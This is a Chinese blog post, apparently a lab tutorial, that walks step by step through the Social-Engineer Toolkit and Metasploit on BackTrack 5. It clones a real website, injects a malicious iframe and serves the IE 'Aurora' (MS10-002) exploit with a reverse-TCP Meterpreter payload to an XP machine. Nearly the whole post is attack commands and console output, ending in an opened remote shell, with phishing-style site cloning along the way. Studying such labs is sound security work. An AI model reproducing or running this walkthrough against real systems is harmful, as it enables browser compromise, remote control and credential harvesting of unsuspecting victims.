metasploit的客户端WEB攻击

73 篇文章 0 订阅
19 篇文章 0 订阅

环境:BT5R3,XP SP3,IE6

操作如下:

root@bt:/pentest/exploits/set# ./set


                   ..######..########.########
                   .##....##.##..........##...
                   .##.......##..........##...
                   ..######..######......##...
                   .......##.##..........##...
                   .##....##.##..........##...
                   ..######..########....##...  

  [---]        The Social-Engineer Toolkit (SET)         [---]        
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]        Development Team: Thomas Werth            [---]
  [---]        Development Team: Garland                 [---]
  [---]                  Version: 3.6                    [---]
  [---]          Codename: 'MMMMhhhhmmmmmmmmm'           [---]
  [---]        Report bugs: davek@trustedsec.com         [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]       Homepage: https://www.trustedsec.com       [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..
    
    Join us on irc.freenode.net in channel #setoolkit

  The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Update SET configuration
   7) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1


 
                      ________________________
                      __  ___/__  ____/__  __/
                      _____ \__  __/  __  /   
                      ____/ /_  /___  _  /    
                      /____/ /_____/  /_/     

  [---]        The Social-Engineer Toolkit (SET)         [---]        
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]        Development Team: Thomas Werth            [---]
  [---]        Development Team: Garland                 [---]
  [---]                  Version: 3.6                    [---]
  [---]          Codename: 'MMMMhhhhmmmmmmmmm'           [---]
  [---]        Report bugs: davek@trustedsec.com         [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]       Homepage: https://www.trustedsec.com       [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..
    
    Join us on irc.freenode.net in channel #setoolkit

  The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) QRCode Generator Attack Vector
  10) Powershell Attack Vectors
  11) Third Party Modules

  99) Return back to the main menu.

set> 2

 The Web Attack module is  a unique way of utilizing multiple web-based attacks
 in order to compromise the intended victim.

 The Java Applet Attack method will spoof a Java Certificate and deliver a 
 metasploit based payload. Uses a customized java applet created by Thomas
 Werth to deliver the payload.

 The Metasploit Browser Exploit method will utilize select Metasploit
 browser exploits through an iframe and deliver a Metasploit payload.

 The Credential Harvester method will utilize web cloning of a web-
 site that has a username and password field and harvest all the 
 information posted to the website.

 The TabNabbing method will wait for a user to move to a different
 tab, then refresh the page to something different.

 The Man Left in the Middle Attack method was introduced by Kos and 
 utilizes HTTP REFERER's in order to intercept fields and harvest 
 data from them. You need to have an already vulnerable site and in-
 corporate <script src="http://YOURIP/">. This could either be from a
 compromised site or through XSS.

 The Web-Jacking Attack method was introduced by white_sheep, Emgent 
 and the Back|Track team. This method utilizes iframe replacements to 
 make the highlighted URL link to appear legitimate however when clicked 
 a window pops up then is replaced with the malicious link. You can edit
 the link replacement settings in the set_config if its too slow/fast.

 The Multi-Attack method will add a combination of attacks through the web attack
 menu. For example you can utilize the Java Applet, Metasploit Browser,
 Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
 all at once to see which is successful.

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Man Left in the Middle Attack Method
   6) Web Jacking Attack Method
   7) Multi-Attack Web Method
   8) Victim Web Profiler
   9) Create or import a CodeSigning Certificate

  99) Return to Main Menu

set:webattack>2

 The first method will allow SET to import a list of pre-defined web 
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.
   
   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>2
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
[-] Enter the IP address of your interface IP or if your using an external IP, what
[-] will be used for the connection back and to house the web server (your interface address)
set:webattack> IP address for the reverse connection:192.168.1.11
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.qq.com

 Enter the browser exploit you would like to use [8]:

   1) Java AtomicReferenceArray Type Violation Vulnerability
   2) Java Applet Field Bytecode Verifier Cache Remote Code Execution
   3) MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption
   4) Microsoft XML Core Services MSXML Uninitialized Memory Corruption
   5) Adobe Flash Player Object Type Confusion
   6) Adobe Flash Player MP4 "cprt" Overflow
   7) MS12-004 midiOutPlayNextPolyEvent Heap Overflow
   8) Java Applet Rhino Script Engine Remote Code Execution
   9) MS11-050 IE mshtml!CObjectElement Use After Free
  10) Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability
  11) Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute
  12) Internet Explorer CSS Import Use After Free (default)
  13) Microsoft WMI Administration Tools ActiveX Buffer Overflow
  14) Internet Explorer CSS Tags Memory Corruption
  15) Sun Java Applet2ClassLoader Remote Code Execution
  16) Sun Java Runtime New Plugin docbase Buffer Overflow
  17) Microsoft Windows WebDAV Application DLL Hijacker
  18) Adobe Flash Player AVM Bytecode Verification Vulnerability
  19) Adobe Shockwave rcsL Memory Corruption Exploit
  20) Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
  21) Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution
  22) Microsoft Help Center XSS and Command Execution (MS10-042)
  23) Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
  24) Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)
  25) Microsoft Internet Explorer Tabular Data Control Exploit (MS10-018)
  26) Microsoft Internet Explorer 7 Uninitialized Memory Corruption (MS09-002)
  27) Microsoft Internet Explorer Style getElementsbyTagName Corruption (MS09-072)
  28) Microsoft Internet Explorer isComponentInstalled Overflow
  29) Microsoft Internet Explorer Explorer Data Binding Corruption (MS08-078)
  30) Microsoft Internet Explorer Unsafe Scripting Misconfiguration
  31) FireFox 3.5 escape Return Value Memory Corruption
  32) FireFox 3.6.16 mChannel use after free vulnerability
  33) Metasploit Browser Autopwn (USE AT OWN RISK!)

set:payloads>24


   1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
   2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker
   4) Windows Bind Shell                      Execute payload and create an accepting port on remote system.
   5) Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
   6) Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
   7) Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
   8) Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
   9) Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter
  10) Windows Meterpreter Reverse DNS         Use a hostname instead of an IP address and use Reverse Meterpreter
  11) Download/Run your Own Executable        Downloads an executable and runs it

set:payloads>2
set:payloads> Port to use for the reverse [443]:

[*] Cloning the website: http://www.qq.com
[*] This could take a little bit...
[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.


***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

[--] Tested on IE6, IE7, IE8, IE9, IE10, Safari, Opera, Chrome, and FireFox [--]

[*] Moving payload into cloned website.
[*] The site has been moved. SET Web Server is now listening..
[-] Launching MSF Listener...
[-] This may take a few to load MSF...
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***

 _                                                      _
/  \  / \        __                          _   __    /_/ __
| |\ /  | _____  \ \            ___   _____ | | /   \  _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | | | |  || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | |_ \__/ | |  | |_
      |/  |____/  \___\/ /\  \___/   \/      \__|     |_\  \___\


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

[*] Processing /pentest/exploits/set/src/program_junk/meta_config for ERB directives.
resource (/pentest/exploits/set/src/program_junk/meta_config)> use windows/browser/ms10_002_aurora
resource (/pentest/exploits/set/src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LHOST 192.168.1.11
LHOST => 192.168.1.11
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (/pentest/exploits/set/src/program_junk/meta_config)> set URIPATH /
URIPATH => /
resource (/pentest/exploits/set/src/program_junk/meta_config)> set SRVPORT 8080
SRVPORT => 8080
resource (/pentest/exploits/set/src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/pentest/exploits/set/src/program_junk/meta_config)> set AutoRunScript migrate -f
AutoRunScript => migrate -f
resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf  exploit(ms10_002_aurora) > 
[*] Started reverse handler on 192.168.1.11:443 
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.1.11:8080/
[*] Server started.

在XP上用IE6打开http://192.168.1.11:8080/,此时BT5输出如下:

[*] 192.168.1.142    ms10_002_aurora - Sending Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (752128 bytes) to 192.168.1.142
[*] Meterpreter session 1 opened (192.168.1.11:443 -> 192.168.1.142:1047) at 2013-04-28 05:11:08 -0400
[*] Session ID 1 (192.168.1.11:443 -> 192.168.1.142:1047) processing AutoRunScript 'migrate -f'
[*] Current server process: IEXPLORE.EXE (1616)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1384
[+] Successfully migrated to process 

查看session,并进入其中一个session:

msf  exploit(ms10_002_aurora) > sessions -l

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  ROOT-9743DD32E3\Administrator @ ROOT-9743DD32E3  192.168.1.11:443 -> 192.168.1.142:1047 (192.168.1.142)

msf  exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: ROOT-9743DD32E3\Administrator
meterpreter > sysinfo
Computer        : ROOT-9743DD32E3
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : zh_CN
Meterpreter     : x86/win32
meterpreter > shell
Process 2036 created.
Channel 1 created.
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\桌面>


  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值